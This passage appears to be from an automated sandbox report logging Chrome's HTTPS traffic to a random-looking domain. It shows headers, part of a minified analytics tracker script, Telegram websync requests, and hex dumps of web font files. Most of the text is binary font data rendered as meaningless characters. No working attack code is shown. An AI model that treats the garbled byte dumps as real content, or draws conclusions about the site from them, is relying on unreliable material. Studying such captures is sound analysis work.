                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.649751104.21.42.794432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC529OUTGET /script.js HTTP/1.1
                                  Host: hu.bafanglaicai.app
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:43 UTC1199INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:43 GMT
                                  Content-Type: application/javascript; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-DNS-Prefetch-Control: on
                                  Content-Security-Policy: default-src 'self';img-src * data:;script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';connect-src 'self' api.umami.is cloud.umami.is;frame-ancestors 'self' undefined
                                  Cache-Control: public, max-age=14400
                                  Last-Modified: Wed, 28 Aug 2024 02:52:03 GMT
                                  ETag: W/"a11-19196e5b838"
                                  Vary: Accept-Encoding
                                  CF-Cache-Status: REVALIDATED
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dx1AFizJYFefBoYDJZ90uc1bB%2Bw%2Fu4x5sQ6rOrw6RdttRDnTZAeRA6ZIp%2BdhwdXLpT7AgOm67REy4eJqGJpx%2F6YeQsFWYtiZfkQhOlrZJk%2FiMB2%2FkVHWnV%2F24AbudFND6fyoI1V6"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e294187041e7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1753&rtt_var=720&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1107&delivery_rate=1665715&cwnd=202&unsent_bytes=0&cid=3a091723055c9573&ts=607&x=0"
                                  2025-01-12 00:03:43 UTC170INData Raw: 61 31 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 3d 3e 7b 63 6f 6e 73 74 7b 73 63 72 65 65 6e 3a 7b 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 61 7d 2c 6e 61 76 69 67 61 74 6f 72 3a 7b 6c 61 6e 67 75 61 67 65 3a 72 7d 2c 6c 6f 63 61 74 69 6f 6e 3a 6e 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 3a 69 2c 64 6f 63 75 6d 65 6e 74 3a 63 2c 68 69 73 74 6f 72 79 3a 6f 7d 3d 74 2c 7b 68 6f 73 74 6e 61 6d 65 3a 73 2c 68 72 65 66 3a 75 7d 3d 6e 2c 7b 63 75 72 72 65 6e 74
                                  Data Ascii: a11!function(){"use strict";(t=>{const{screen:{width:e,height:a},navigator:{language:r},location:n,localStorage:i,document:c,history:o}=t,{hostname:s,href:u}=n,{current
                                  2025-01-12 00:03:43 UTC1369INData Raw: 53 63 72 69 70 74 3a 6c 2c 72 65 66 65 72 72 65 72 3a 64 7d 3d 63 3b 69 66 28 21 6c 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 66 3d 22 64 61 74 61 2d 22 2c 6d 3d 6c 2e 67 65 74 41 74 74 72 69 62 75 74 65 2e 62 69 6e 64 28 6c 29 2c 68 3d 6d 28 66 2b 22 77 65 62 73 69 74 65 2d 69 64 22 29 2c 70 3d 6d 28 66 2b 22 68 6f 73 74 2d 75 72 6c 22 29 2c 67 3d 6d 28 66 2b 22 74 61 67 22 29 2c 79 3d 22 66 61 6c 73 65 22 21 3d 3d 6d 28 66 2b 22 61 75 74 6f 2d 74 72 61 63 6b 22 29 2c 62 3d 22 74 72 75 65 22 3d 3d 3d 6d 28 66 2b 22 65 78 63 6c 75 64 65 2d 73 65 61 72 63 68 22 29 2c 76 3d 6d 28 66 2b 22 64 6f 6d 61 69 6e 73 22 29 7c 7c 22 22 2c 53 3d 76 2e 73 70 6c 69 74 28 22 2c 22 29 2e 6d 61 70 28 28 74 3d 3e 74 2e 74 72 69 6d 28 29 29 29 2c 77 3d 60 24 7b 28 70 7c 7c
                                  Data Ascii: Script:l,referrer:d}=c;if(!l)return;const f="data-",m=l.getAttribute.bind(l),h=m(f+"website-id"),p=m(f+"host-url"),g=m(f+"tag"),y="false"!==m(f+"auto-track"),b="true"===m(f+"exclude-search"),v=m(f+"domains")||"",S=v.split(",").map((t=>t.trim())),w=`${(p||
                                  2025-01-12 00:03:43 UTC1045INData Raw: 68 61 72 61 63 74 65 72 44 61 74 61 3a 21 30 2c 63 68 69 6c 64 4c 69 73 74 3a 21 30 7d 29 7d 29 28 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 28 61 73 79 6e 63 20 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 74 3d 3e 5b 22 42 55 54 54 4f 4e 22 2c 22 41 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 29 2c 61 3d 61 73 79 6e 63 20 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 2e 62 69 6e 64 28 74 29 2c 61 3d 65 28 41 29 3b 69 66 28 61 29 7b 63 6f 6e 73 74 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 61 6d 65 73 28 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 74 2e 6d 61 74 63 68 28 54 29 3b 61 26 26 28 72 5b 61 5b 31 5d 5d 3d 65 28 74 29
                                  Data Ascii: haracterData:!0,childList:!0})})(),c.addEventListener("click",(async t=>{const e=t=>["BUTTON","A"].includes(t),a=async t=>{const e=t.getAttribute.bind(t),a=e(A);if(a){const r={};return t.getAttributeNames().forEach((t=>{const a=t.match(T);a&&(r[a[1]]=e(t)
                                  2025-01-12 00:03:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.649756149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC541OUTGET /_websync_?authed=0&version=10.9.21+A HTTP/1.1
                                  Host: t.me
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:43 UTC482INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:43 GMT
                                  Content-Type: application/json; charset=utf-8
                                  Content-Length: 4
                                  Connection: close
                                  Set-Cookie: stel_web_auth=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Set-Cookie: stel_web_force=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:43 UTC4INData Raw: 74 72 75 65
                                  Data Ascii: true


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.649757149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC548OUTGET /_websync_?authed=0&version=10.9.21+A HTTP/1.1
                                  Host: telegram.me
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:43 UTC482INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:43 GMT
                                  Content-Type: application/json; charset=utf-8
                                  Content-Length: 4
                                  Connection: close
                                  Set-Cookie: stel_web_auth=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Set-Cookie: stel_web_force=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:43 UTC4INData Raw: 74 72 75 65
                                  Data Ascii: true


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.649766172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC635OUTGET /KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.324b1e6d0f5ae7c6ab42.woff2 HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: font
                                  Referer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.css
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:43 UTC911INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:43 GMT
                                  Content-Type: font/woff2
                                  Content-Length: 11056
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-2b30"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6950
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wfbl%2F9nM33mYRp3QrFHQGp0TyonvemLEYqdwDqcjAl8dPm78R4EXG5zeLSrVF9xX%2B0YVvqWEW9bGO3tb6PbSX%2BCB5Lr8HYQGqeuZm23Opw5f%2B8hSoR4%2FD%2BeFdbDwGQ8X5erNhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e29798a715c3-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=11997&min_rtt=1548&rtt_var=6907&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1213&delivery_rate=1886304&cwnd=252&unsent_bytes=0&cid=9d96d0bd3d405b68&ts=159&x=0"
                                  2025-01-12 00:03:43 UTC458INData Raw: 77 4f 46 32 00 01 00 00 00 00 2b 30 00 0e 00 00 00 00 54 7c 00 00 2a d8 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 64 1b 9a 1e 1c 83 7c 06 60 00 87 6c 11 0c 0a ef 48 d8 6c 0b 83 72 00 01 36 02 24 03 87 60 04 20 05 83 00 07 20 1b 3b 46 33 03 c1 c6 01 00 50 67 26 a3 91 11 6c 1c 00 14 6d 50 14 65 83 b2 25 f8 3f 24 68 0b 86 e0 b5 07 ad 89 09 63 62 0c 8a 9a 29 4b 6b 11 08 63 20 99 c2 78 79 ad 96 1d f2 f5 e3 ac e9 e5 7c 57 ad 75 77 b5 1e 31 f6 d5 9f 09 71 08 a2 7f 6a cc f1 63 cc 23 db c7 c2 0f 00 c4 8e d1 d0 48 62 12 44 76 c1 7f 75 4f cf ed 13 9d 89 8e cc 90 88 18 84 42 04 28 83 3f 78 f3 03 3f b7 de 5f 41 4b a9 08 da a0 4d c5 08 47 8e c8 9c 94 b8 51 39 46 b5 44 4b 85 03 41 11 45 aa 0c f4 80 43 2c 4a 2c 7a 8a e7 89 52 00 ff 44 d5
                                  Data Ascii: wOF2+0T|*d|`lHlr6$` ;F3Pg&lmPe%?$hcb)Kkc xy|Wuw1qjc#HbDvuOB(?x?_AKMGQ9FDKAEC,J,zRD
                                  2025-01-12 00:03:43 UTC1369INData Raw: 6c 5f 85 ab b2 f7 7f fb 7d ab f3 16 b1 f4 09 e9 93 ac 24 ce d6 34 ef ce d3 99 79 cf bf cd 5f 53 0d 65 89 5e 69 e2 92 34 6d e2 90 f6 50 3d 42 88 1e 0a 21 91 23 24 d1 50 08 b1 10 69 c0 e3 d6 7f ef 3d f1 8d d3 fe af 84 10 82 04 11 b1 ad bc d5 30 8b 5d 15 86 17 56 07 a3 96 b1 55 c1 75 20 19 73 e8 c7 bf 52 40 e1 04 e0 00 28 ac 84 29 43 68 70 80 08 15 0a 11 2b 16 22 5e 3c 04 0d 0d 22 59 32 44 aa 74 88 3a 8d 50 fa 7c 87 40 a0 80 45 80 25 20 40 40 84 42 80 85 88 51 86 d9 6d 0f 3d 33 10 38 35 34 d0 07 04 ce 0c 74 bf 01 02 e7 39 93 fd 40 00 06 30 22 80 38 f7 f4 40 3f 60 06 02 08 18 28 20 b1 d6 b5 10 c5 30 c0 5e 21 52 01 15 10 52 a1 d9 76 0b 30 2b 14 67 ec 97 9c b9 4c f1 a7 40 0a 25 3e f5 d2 2f 63 ea 64 e6 64 61 59 65 47 e3 6a 47 ca a1 1c ca ad a9 37 8b 22 35 72 91
                                  Data Ascii: l_}$4y_Se^i4mP=B!#$Pi=0]VUu sR@()Chp+"^<"Y2Dt:P|@E% @@BQm=3854t9@0"8@?`( 0^!RRv0+gL@%>/cddaYeGjG7"5r
                                  2025-01-12 00:03:43 UTC1369INData Raw: 77 e8 c1 8a 2c 78 18 79 f1 10 b2 21 17 df 9e d6 86 d0 15 89 ec 0d d1 88 b1 d0 cc 21 84 25 b1 b3 26 2c 9b 9d 99 77 88 cc 16 87 78 08 25 8d 50 d2 37 47 e4 bb ed c8 56 91 1b f9 90 1b f9 2c 3e 4f 90 47 40 9c 44 ed 13 51 c8 82 6c c0 34 67 15 b2 49 44 87 18 be 65 17 16 99 15 f7 5b 52 d5 4a fd 75 5c ce 6a f5 70 dc 85 69 e7 63 34 4e b3 d9 d5 c4 4c 05 f7 30 51 29 54 dc df 50 af 48 ef 00 15 0b 3a c4 50 3f 78 98 89 ae b4 49 c0 0a 21 71 26 76 81 d6 d1 9f ac fa 08 a0 6e cf 74 da 05 fe be 70 f5 3f ed e9 00 12 e7 79 7b 3a 83 a2 42 d5 fb 1b 9c e7 ef ea 03 16 17 50 7c 03 c1 ae 97 e7 43 03 4c 34 6b 36 28 1d b3 62 84 6b 16 f0 41 ef 89 8b 10 2d 81 68 e8 5e 41 80 c0 1c 91 48 b3 3c 07 86 27 09 02 a8 81 72 6a 80 a6 43 5f 1d 14 fd e8 d4 c7 b1 91 8c d4 4b a3 d4 5d 75 06 61 46 1e
                                  Data Ascii: w,xy!!%&,wx%P7GV,>OG@DQl4gIDe[RJu\jpic4NL0Q)TPH:P?xI!q&vntp?y{:BP|CL4k6(bkA-h^AH<'rjC_K]uaF
                                  2025-01-12 00:03:43 UTC1369INData Raw: ee d3 e7 98 43 86 93 dc f8 f3 af ba aa 12 17 cc 66 f5 a3 09 f9 96 d7 24 aa 5e 08 ad 48 56 f5 b1 b0 e3 26 8c fb b9 b4 55 d5 fc bc 69 f2 0d 67 c1 07 f6 7f 71 b8 ac 1d 5d aa b7 b6 82 c5 85 ac b1 3d 92 8c fe 7d 26 e9 f6 95 70 ae be d7 5b 2c ba 5e f8 53 cc 03 1d 9e 04 ed 1d 3b 36 6b aa 96 17 1d 7a 7e 85 1b 4b 6d ec e6 03 11 d2 f1 02 40 99 ae 53 b1 fe 04 98 db 4b 37 c8 d5 39 b9 2d 98 c5 d6 8d 68 19 36 73 81 de c9 8e e3 33 b8 d8 23 28 77 e0 50 b9 6c 14 b3 d4 e3 28 7b 4e a6 10 ee f8 dc b6 f8 46 52 13 74 88 ce 26 fa db 5c ed ab d9 3f 4b 2e 3a a7 f0 2e a3 62 33 2a 5f a8 58 8f cd cf 37 d8 d6 d2 8d 5f f5 6c 71 c1 1a 5f a4 24 65 0f 17 9f d1 7b c0 6d b6 47 52 e6 54 ee 96 c6 9a bd 7f 76 64 f8 da 16 4f 15 6d 25 66 06 ea fb b5 f0 76 b3 ae e5 d2 7e 3b fb 46 d1 e8 87 ce 6a
                                  Data Ascii: Cf$^HV&Uigq]=}&p[,^S;6kz~Km@SK79-h6s3#(wPl({NFRt&\?K.:.b3*_X7_lq_$e{mGRTvdOm%fv~;Fj
                                  2025-01-12 00:03:43 UTC1369INData Raw: df 41 f9 59 7f 4f b0 85 da 3e d4 93 b0 e3 ae 3e 40 5f 23 d0 1d c7 f8 d9 69 6a 9b 02 91 81 b2 e3 dc 37 7d 41 86 01 4b 1f 46 bb db 01 96 89 3b 4e 23 68 8b 2d 78 a5 0a 8d d8 27 fd 8f 89 86 c8 96 97 08 19 0d 5c 14 25 79 6d 9d 18 12 95 97 25 6a 53 0f 06 dc d2 c1 67 e3 52 d9 db ae 26 1d ea c2 f3 a2 45 dd a2 06 ba af 4f e5 58 79 39 46 05 b7 7e 45 3d 61 4b eb e4 74 c5 a6 2f f9 ae fc 77 54 5e 3d 45 76 51 fc f1 b9 08 92 e2 11 e6 37 fc 7e 5b 69 08 7f 8e f8 51 37 31 db c2 bb 50 f9 b6 95 bf f7 fb f0 6e 54 40 96 b3 d3 0d 4f 67 4b 92 d7 c1 66 b6 a1 ab 87 74 82 4d e3 f3 97 dd 3c 43 15 83 23 87 67 b6 46 19 51 51 c9 e4 c0 20 5f c0 49 15 52 1b 1b 52 d2 1a 1a 92 b5 e2 1b ea 53 12 db 6a d2 1a b1 1a 7a 66 d7 95 75 cd b4 b5 35 f4 cc a3 74 2c 88 67 ce 89 d1 5a 6b 13 93 5a 6a d3
                                  Data Ascii: AYO>>@_#ij7}AKF;N#h-x'\%ym%jSgR&EOXy9F~E=aKt/wT^=EvQ7~[iQ71PnT@OgKftM<C#gFQQ _IRRSjzfu5t,gZkZj
                                  2025-01-12 00:03:43 UTC1369INData Raw: 89 a9 89 62 da fd 71 48 75 d8 87 8a 7d 1b 56 5d 91 04 71 d1 7f 5e 62 7e cc ad fe fc f8 6c 9f 1c 48 f6 f5 08 a1 05 83 34 b9 a6 6d 94 e9 02 9a 53 5b 1a ff 48 1c a7 9e 1b ba 72 15 b2 26 f2 27 73 9e 1e 08 4e 8c d0 05 d4 ed 04 a4 ec 88 fc 0e bc c8 1f 2b b0 ea d2 25 30 e3 cc 1f b3 28 a1 33 18 07 c0 9f 8b 79 2c 2c 87 6b b8 d8 c9 c1 f1 1b 8c 97 3b e6 72 55 79 5a ee b5 f3 b5 dc be 0e d3 26 b3 b7 35 9c 37 ea c6 d3 94 4f 80 99 7d cc ee 7d a4 a1 a6 1b 90 af 66 db 3d d8 ba 86 ce 83 3d c8 3a 7e 42 cc 4b 73 ed fb c9 3f 2f e7 f8 37 fe 5c 9d 14 4b 4c 8f 0a 09 ca 4c 8b 44 64 c1 38 a7 e3 45 9c 08 c5 ea d7 60 75 ae f4 f7 a7 9a 74 fe 61 7b 27 5d fd 0f 66 ef c1 9f 86 ea 35 bf 98 af 77 b3 d4 37 16 34 89 09 88 d3 8f 1a ec 73 2f cd e5 a4 0d 47 4a 69 3a 70 1c 52 fa 8d 89 c9 8c 09
                                  Data Ascii: bqHu}V]q^b~lH4mS[Hr&'sN+%0(3y,,k;rUyZ&57O}}f==:~BKs?/7\KLLDd8E`uta{']f5w74s/GJi:pR
                                  2025-01-12 00:03:43 UTC1369INData Raw: 4f ea 41 60 e1 ae 1c fa ef f4 a7 2e f3 2e f3 af 2f d0 7f ef ca 89 a6 76 49 b4 af 3e 1c 5f 1a ec 18 5c 1a 79 d4 b1 da 29 01 fa 43 3c f4 de f7 19 3a 11 b2 45 49 aa a7 cf ab e9 79 9a 0d 34 77 2d e4 e9 50 f1 59 f1 aa 67 2e a8 99 fa 9b 41 63 fe 4b 84 8a 42 b8 28 b2 72 44 1d 15 55 a2 8e 9c 2c 51 47 55 85 a8 03 06 ad d6 c1 9e 58 c3 55 74 e2 f0 d3 6c c1 af e3 5f ef 9f 99 3a f9 f6 f8 ec d4 a9 fb 67 96 c6 17 cb 04 bb ff 45 97 ac e2 1c 29 64 db b5 43 b2 40 a4 47 b5 c0 be 39 ee 6e e2 75 b3 6e 98 38 36 69 e2 75 d9 cf 16 d7 5d 35 56 c2 b4 33 f9 eb cb ed 4f af bb 7f 38 7a 79 39 58 7b c4 7a 31 ef c8 8e 81 da f4 8d f2 a8 a9 c9 b2 c8 98 f8 b4 4c 5a 92 6b c9 c8 b8 4f 4d 66 4e 5a 66 7a 56 71 60 ff 60 31 39 2b 37 3d 2b f7 36 a9 7c 72 c0 b9 24 25 2d 3d 4b 2e 2e 3c c4 f7 59 2f
                                  Data Ascii: OA`../vI>_\y)C<:EIy4w-PYg.AcKB(rDU,QGUXUtl_:gE)dC@G9nun86iu]5V3O8zy9X{z1LZkOMfNZfzVq``19+7=+6|r$%-=K..<Y/
                                  2025-01-12 00:03:43 UTC1369INData Raw: 66 46 b6 fb 8b a1 42 42 0f 2d b3 b7 3e 41 cc f1 ec f7 f9 b3 fc 5d e9 d2 eb ce 97 9d 3e ca 3f 97 c4 5c 97 27 6f 77 c1 aa 52 32 3c a9 0f d4 02 79 7e 2e 8b 0c 76 d4 67 67 aa 64 5c f2 0e a2 8f 2c 0b e3 76 31 75 71 0f 83 c8 b5 c4 31 f0 0c 08 9c 06 d7 3a de d0 7a e6 9c 5c 76 a4 11 df 92 c5 cd 9a df 10 1e a0 76 bf 12 e6 fe b8 45 ff 23 2d b1 e3 ae 9e ec 72 37 39 6c ab da 9e c3 23 99 81 f6 69 b0 39 ff 1f a7 c8 e2 af 04 3a c1 f4 be bd 0f cc 6d a0 d6 93 9a 58 53 b2 ca 28 d6 19 97 34 c5 0d ca 34 95 9f 12 42 7e a6 b6 26 b4 ee ad 70 5c 45 ed 30 37 25 3c 0c 0d 4e e8 ee af a3 f5 86 50 12 1f 2a 73 f5 98 07 27 f1 86 74 1d f3 0f 08 05 29 a9 6f 6c 43 f9 25 79 25 03 1c 9c bc 99 70 d8 e3 b2 7d 74 58 53 44 b0 93 b3 7a ec a6 a8 30 ae 17 a2 2a 04 11 51 c2 75 31 11 65 55 17 9c 0b
                                  Data Ascii: fFBB->A]>?\'owR2<y~.vggd\,v1uq1:z\vvE#-r79l#i9:mXS(44B~&p\E07%<NP*s't)olC%y%p}tXSDz0*Qu1eU
                                  2025-01-12 00:03:43 UTC1015INData Raw: 59 92 4f 3a 9d 6e a6 67 53 ef b6 a1 90 5a 19 8a 36 40 5f 3f ec 3d 64 7c 2e f1 b8 d6 cc cc ac 2e 83 45 4c 96 3c 2c 9f e1 01 7d 97 49 e6 62 b2 ec 2a 43 0d 5e 1e 8f b9 62 7d eb c3 f2 40 ed 37 29 5d 4c 79 63 96 31 0e e2 b1 b2 b2 1a e4 55 b8 c6 54 f2 f2 98 73 f4 39 f3 a6 41 93 07 fa f2 d3 55 1e 63 bd 9f 9c 64 60 b2 71 82 28 91 ce ea ed 0f 26 1b c2 60 02 f5 b1 cd e6 6c ed f7 0c b0 23 be be a7 9e 32 78 0e 0c e7 8a ed 47 19 30 1d eb c5 36 83 3d 42 7d 4f 18 9d 20 ee ec bf 64 82 3c 1b d7 78 60 9c d1 ff 1f cd 77 bf b8 8f 08 05 ed 5f 7d 8f 21 a7 53 9a 01 76 24 1e 2b ec 4f 05 3b db cf fe b0 23 61 0c f6 f9 be 6d 2e 42 d8 36 4c da 7e b0 e9 d3 db f7 24 60 6c 5d 80 9c fe fd 03 c8 b5 97 da ec 93 2e 76 c7 c5 15 ff ce 7c 6c 01 00 bc f6 3b f7 66 80 8f c2 e4 e7 ff 85 fe 3f cb
                                  Data Ascii: YO:ngSZ6@_?=d|..EL<,}Ib*C^b}@7)]Lyc1UTs9AUcd`q(&`l#2xG06=B}O d<x`w_}!Sv$+O;#am.B6L~$`l].v|l;f?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.649767172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC631OUTGET /KFOmCnqEu92Fr1Mu4mxKKTU1Kg.465390c6e54c60f4a15f.woff2 HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: font
                                  Referer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.css
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: font/woff2
                                  Content-Length: 11016
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-2b08"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6951
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWp2OhXaUK0edCBSyXlHEweSic6zHnOda6OxzNFOq0Je5EVMgBTiuBU63maVr7SFtd0ECJbPrq0goQ0iEZZvEEdOldujG%2Br%2FI37joiggoIOTcxoSUeoZ2e6geBx1s6ZEZkGHxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e29818ee8cc3-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1801&rtt_var=752&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1209&delivery_rate=1621321&cwnd=224&unsent_bytes=0&cid=adecd19429bee1e9&ts=154&x=0"
                                  2025-01-12 00:03:44 UTC468INData Raw: 77 4f 46 32 00 01 00 00 00 00 2b 08 00 0e 00 00 00 00 54 70 00 00 2a b1 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 64 1b 99 64 1c 83 7c 06 60 00 87 6c 11 0c 0a f0 04 d9 26 0b 83 72 00 01 36 02 24 03 87 60 04 20 05 82 74 07 20 1b 2f 46 b3 a2 ac ef 52 9c e2 bf 4e e0 c6 50 78 0d b5 17 2e 89 a5 30 9d 8a cc ce bc d5 74 11 25 10 03 36 5f c6 4d 71 dd 3b f4 0b 1e 5d 6c ce e4 da 4e 84 96 11 92 cc 12 3c df 9f bc 73 95 7c b3 7d b5 b1 96 b1 a7 91 73 40 73 bb 5f 31 a2 06 62 14 a0 60 14 2d 2d 29 51 2d d1 a3 42 72 d0 a3 4b 68 19 f4 86 4a 94 a2 12 65 d1 62 d0 66 1c e9 b4 66 64 c9 30 a3 b5 1e 88 6a 6e ef aa 07 5a ed 2a 76 2e 40 4e a2 03 16 4c b3 4a 3a 29 69 1f a1 68 ef fb ef a8 94 ed c0 3f d3 f3 ec bc ea 6f 22 30 10 1a 50 af c1 01 ce ed 9b
